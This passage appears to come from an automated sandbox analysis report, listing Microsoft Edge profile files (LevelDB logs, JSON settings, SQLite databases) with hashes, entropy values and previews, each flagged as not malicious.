                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1iL+q2PFi23oH+Tcwt8NIFUt8YWi1xKWZmw+YWi1nLVkwOFi23oH+Tcwt8+ed:2i1iL+vdZYebpFUt87i1MW/+7i1nLV5X
                                                                                                                                                                                                                                                      MD5:B9980D83EE1C9A0DD8433B7552EE39DB
                                                                                                                                                                                                                                                      SHA1:B95AC7AF5F7D96290B2347505FE42CD0C3980D5A
                                                                                                                                                                                                                                                      SHA-256:AE6DEB50744B6EADEFDBC5BD5C3CAF27E59EC77937DC56501B2BFED90D8320DC
                                                                                                                                                                                                                                                      SHA-512:1134DAF5A7C6F50B388044871B6B7161C7DDF413D7A7B731F03C9A5FEE06EEB527408EFE98671A022C0DF73A7802D561E398D1F0A0D8FB9612F853D66811766D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.418 ccc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/30-16:38:34.419 ccc Recovering log #3.2024/11/30-16:38:34.419 ccc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):317
                                                                                                                                                                                                                                                      Entropy (8bit):5.205124286232872
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1iL+q2PFi23oH+Tcwt8NIFUt8YWi1xKWZmw+YWi1nLVkwOFi23oH+Tcwt8+ed:2i1iL+vdZYebpFUt87i1MW/+7i1nLV5X
                                                                                                                                                                                                                                                      MD5:B9980D83EE1C9A0DD8433B7552EE39DB
                                                                                                                                                                                                                                                      SHA1:B95AC7AF5F7D96290B2347505FE42CD0C3980D5A
                                                                                                                                                                                                                                                      SHA-256:AE6DEB50744B6EADEFDBC5BD5C3CAF27E59EC77937DC56501B2BFED90D8320DC
                                                                                                                                                                                                                                                      SHA-512:1134DAF5A7C6F50B388044871B6B7161C7DDF413D7A7B731F03C9A5FEE06EEB527408EFE98671A022C0DF73A7802D561E398D1F0A0D8FB9612F853D66811766D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.418 ccc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/30-16:38:34.419 ccc Recovering log #3.2024/11/30-16:38:34.419 ccc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8720
                                                                                                                                                                                                                                                      Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RlDl9tFlljq7A/mhWJFuQ3yy7IOWU5l/notdweytllrE9SFcTp4AGbNCV9RUIpk:RlDlG75fOXtn4d0Xi99pEYnk
                                                                                                                                                                                                                                                      MD5:30C6403F24104946C6A365BEA23C4A04
                                                                                                                                                                                                                                                      SHA1:59ED3186D703179C4C2D2C0861C524AF5FAA19DB
                                                                                                                                                                                                                                                      SHA-256:54628058BDA79B668CE14DFBC54D0934F6EFA24F15032E851351AF873AFBE750
                                                                                                                                                                                                                                                      SHA-512:2235813EAC6D15BF0243CBD2924E199FB09CBB507CF6E0EC10ADEB50B27F911020FC556329A08B1F90F1CBF1A3A389167B99A89B05322A31D80F81D51F24C8DE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.............h.....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                      Entropy (8bit):3.6481101165292493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:aj9P0tbQkQerkjl5cbP/KbtZ773pL9hCgam6ItRKToaAu:adKe2ml+bP/o7Pv9RKcC
                                                                                                                                                                                                                                                      MD5:FA8EC40ED9F61724A8AAE14F146E8ABC
                                                                                                                                                                                                                                                      SHA1:92BF481BB99EAC8D312AD5998C0B5ADB98B1F827
                                                                                                                                                                                                                                                      SHA-256:2B1B3E6FFBB45D7CC182AFAA2B1DB5E4F7CDF495EC7BAA258C9B2D34B1947497
                                                                                                                                                                                                                                                      SHA-512:8980A828715627BEAECE18A272172C895DC7167A289F73B9664D855AF6A0F8EB3E8225C10F7A6AD5C5D5C5299F12806232C76CD4AC443142C803CEF6517154F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):401
                                                                                                                                                                                                                                                      Entropy (8bit):5.292659243999242
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:2i1rL+vdZYeb8rcHEZrELFUt87i12E2W/+7i12E1LV5wZYeb8rcHEZrEZSJ:bFYbYeb8nZrExg8uNNN1DgYeb8nZrEZe
                                                                                                                                                                                                                                                      MD5:33670A9949758A5ABF89F2E1972E358A
                                                                                                                                                                                                                                                      SHA1:B99BF97DD7BB62EE71D713349754EAC0F8E9A563
                                                                                                                                                                                                                                                      SHA-256:572D8FF92984BBBD4D7D7506ADB264A05A9ADC856751BDDF9CFE9F6E8D2A162A
                                                                                                                                                                                                                                                      SHA-512:167CDEA2B493BA5FF26FF2E5BD954E69AC4DDAFE72C9E1FCB0BEAD2124F718383FADD2D1DEA7D28A948337352CE85556D74F73B3664776DDB2AF17267B750BCE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:38.969 ccc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/30-16:38:38.970 ccc Recovering log #3.2024/11/30-16:38:38.970 ccc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):401
                                                                                                                                                                                                                                                      Entropy (8bit):5.292659243999242
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:2i1rL+vdZYeb8rcHEZrELFUt87i12E2W/+7i12E1LV5wZYeb8rcHEZrEZSJ:bFYbYeb8nZrExg8uNNN1DgYeb8nZrEZe
                                                                                                                                                                                                                                                      MD5:33670A9949758A5ABF89F2E1972E358A
                                                                                                                                                                                                                                                      SHA1:B99BF97DD7BB62EE71D713349754EAC0F8E9A563
                                                                                                                                                                                                                                                      SHA-256:572D8FF92984BBBD4D7D7506ADB264A05A9ADC856751BDDF9CFE9F6E8D2A162A
                                                                                                                                                                                                                                                      SHA-512:167CDEA2B493BA5FF26FF2E5BD954E69AC4DDAFE72C9E1FCB0BEAD2124F718383FADD2D1DEA7D28A948337352CE85556D74F73B3664776DDB2AF17267B750BCE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:38.969 ccc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/30-16:38:38.970 ccc Recovering log #3.2024/11/30-16:38:38.970 ccc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1471
                                                                                                                                                                                                                                                      Entropy (8bit):5.674931434507065
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:XZWbl/vXaoJZ3XZtW2sFV03y1x4KnMyp4WJUlHG1NcgFHHmb2cytXo1:XZC/vZXZk2iV03Sx4lye4l1RHHS2/41
                                                                                                                                                                                                                                                      MD5:A0544C8299D67EBA0252B6FF3A0B0D29
                                                                                                                                                                                                                                                      SHA1:450DF306EEF86A4CDAB18B6A86E787335EDCE78F
                                                                                                                                                                                                                                                      SHA-256:2CE8406A9A7388FC932B8CA8ECD44EBB821C4A87B8EAB05296813F654CCEDE9A
                                                                                                                                                                                                                                                      SHA-512:BACB66C4F0D70089ABFBDF0CDD417DA6035499F4118CAE7B3905CED3B0681C0093369F11827246D6D015A796B5C4DEA5FE455860C468BDA3DEDC3E4041D7D41A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.....................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1733002729515.-_https://ntp.msn.com..LastVisuallyReadyMarker..1733002730631.._https://ntp.msn.com..MUID!.2A00BA3058306B91366DAF7759986AB6.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1733002729621,"schedule":[-1,-1,33,-1,34,18,-1],"scheduleFixed":[-1,-1,33,-1,34,18,-1],"simpleSchedule":[32,44,30,34,31,25,45]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1733002729465.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241122.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Sat Nov 30 2024 16:38:49 GMT-0500 (Eastern Standa
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                      Entropy (8bit):5.225161813853661
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1I34q2PFi23oH+Tcwt8a2jMGIFUt8YWi1SvJZmw+YWi17vDkwOFi23oH+Tcw2:2i1K4vdZYeb8EFUt87i1kJ/+7i1/5wZo
                                                                                                                                                                                                                                                      MD5:C506F93BD8286FA3E6615B0E944F4188
                                                                                                                                                                                                                                                      SHA1:62F849F14903AC45512660D94D91E2CBC9713502
                                                                                                                                                                                                                                                      SHA-256:9724646141DE808C984620EFC2BFCDDE64AE4D567DC689F6DF15DB22F2916945
                                                                                                                                                                                                                                                      SHA-512:EDB24D6492CCB09845502BDBA296F7240E140FA74CF33496345382527B60CF22927481BB2D1E342ADDC5906A0A7DCE6DBE8CDC1E5E338B57AC2B1D6CA54D26D4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.590 590 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/30-16:38:34.592 590 Recovering log #3.2024/11/30-16:38:34.595 590 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                      Entropy (8bit):5.225161813853661
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1I34q2PFi23oH+Tcwt8a2jMGIFUt8YWi1SvJZmw+YWi17vDkwOFi23oH+Tcw2:2i1K4vdZYeb8EFUt87i1kJ/+7i1/5wZo
                                                                                                                                                                                                                                                      MD5:C506F93BD8286FA3E6615B0E944F4188
                                                                                                                                                                                                                                                      SHA1:62F849F14903AC45512660D94D91E2CBC9713502
                                                                                                                                                                                                                                                      SHA-256:9724646141DE808C984620EFC2BFCDDE64AE4D567DC689F6DF15DB22F2916945
                                                                                                                                                                                                                                                      SHA-512:EDB24D6492CCB09845502BDBA296F7240E140FA74CF33496345382527B60CF22927481BB2D1E342ADDC5906A0A7DCE6DBE8CDC1E5E338B57AC2B1D6CA54D26D4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.590 590 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/30-16:38:34.592 590 Recovering log #3.2024/11/30-16:38:34.595 590 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1453
                                                                                                                                                                                                                                                      Entropy (8bit):5.299803863750056
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7n7:YcCpWsquCvsBfcKspgCgakhYhbZ
                                                                                                                                                                                                                                                      MD5:49E07F0A54085E54BDBBFCBDD5B7C780
                                                                                                                                                                                                                                                      SHA1:55DDE7C1255DCF8F037B680820CE1ECB28A529BB
                                                                                                                                                                                                                                                      SHA-256:8A27056E0DE426ECCBBD3832D1B3702DD0D5B85E9F2B7199D53897075E732E44
                                                                                                                                                                                                                                                      SHA-512:E2BA1B5644A85E4A7E9CB6885077BE26C01EF1CB2F8BBB70EE4D056539E37472A77EA3A1529E519A0535687E51C7801635487933A6AD44C602D3FD4668117421
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):2.774857525394494
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tTdMqN2qEVrRJRHiAV9sKpiNDXcf0L/ZJVb:Vd9N2fVNJRHiA2XI0LhJVb
                                                                                                                                                                                                                                                      MD5:C083CD6CB3D6217547B2DD048B721FDB
                                                                                                                                                                                                                                                      SHA1:A9317127BEFE92ECDE15614F5B4CA303063A9914
                                                                                                                                                                                                                                                      SHA-256:CDD76DD261B6CC6B109801CD7275E85A7035FED38D397341134D49AC3DCC985C
                                                                                                                                                                                                                                                      SHA-512:45E205BD06ED6C981425E88B3E888E0B6A9415235808CF3CA4BB3F2C59C9FFD844AE25D0BC65C6D6F90EE5CAB707C5EA707F90A39B4D335162E60B2CB2D8687E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1453
                                                                                                                                                                                                                                                      Entropy (8bit):5.299803863750056
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7n7:YcCpWsquCvsBfcKspgCgakhYhbZ
                                                                                                                                                                                                                                                      MD5:49E07F0A54085E54BDBBFCBDD5B7C780
                                                                                                                                                                                                                                                      SHA1:55DDE7C1255DCF8F037B680820CE1ECB28A529BB
                                                                                                                                                                                                                                                      SHA-256:8A27056E0DE426ECCBBD3832D1B3702DD0D5B85E9F2B7199D53897075E732E44
                                                                                                                                                                                                                                                      SHA-512:E2BA1B5644A85E4A7E9CB6885077BE26C01EF1CB2F8BBB70EE4D056539E37472A77EA3A1529E519A0535687E51C7801635487933A6AD44C602D3FD4668117421
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1453
                                                                                                                                                                                                                                                      Entropy (8bit):5.299803863750056
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7n7:YcCpWsquCvsBfcKspgCgakhYhbZ
                                                                                                                                                                                                                                                      MD5:49E07F0A54085E54BDBBFCBDD5B7C780
                                                                                                                                                                                                                                                      SHA1:55DDE7C1255DCF8F037B680820CE1ECB28A529BB
                                                                                                                                                                                                                                                      SHA-256:8A27056E0DE426ECCBBD3832D1B3702DD0D5B85E9F2B7199D53897075E732E44
                                                                                                                                                                                                                                                      SHA-512:E2BA1B5644A85E4A7E9CB6885077BE26C01EF1CB2F8BBB70EE4D056539E37472A77EA3A1529E519A0535687E51C7801635487933A6AD44C602D3FD4668117421
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                      Category:dropped
